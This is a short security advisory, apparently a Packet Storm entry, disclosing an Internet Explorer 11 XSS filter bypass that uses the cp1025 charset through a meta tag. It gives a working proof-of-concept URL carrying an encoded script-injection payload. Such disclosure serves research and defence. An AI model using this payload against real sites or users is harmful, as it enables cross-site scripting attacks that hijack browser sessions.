Microsoft Internet Explorer 11 XSS Filter Bypass

2016-06-12T00:00:00
ID PACKETSTORM:137432
Type packetstorm
Reporter Rafay Baloch
Modified 2016-06-12T00:00:00

Description

                                        
                                            `#Vulnerability: IE 11 XSS Filter Bypass  
#Impact: Moderate  
#Authors: Rafay Baloch  
#Company: RHAInfoSec  
#Website: http://rafayhackingarticles.net  
#version: Latest  
  
Description  
  
Internet explorer 11 Suffers from a XSS Filter bypass using cp1025  
charset. This is highly effective when the charset has not been set by  
the webmaster.  
The issue occurs due to the fact that in the regular expressions  
authors are trying to filter "http-equiv" instead of filtering out the  
"<meta charset" keyword.  
  
Proof of Concept  
  
The following is the Proof of concept:  
http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n  
`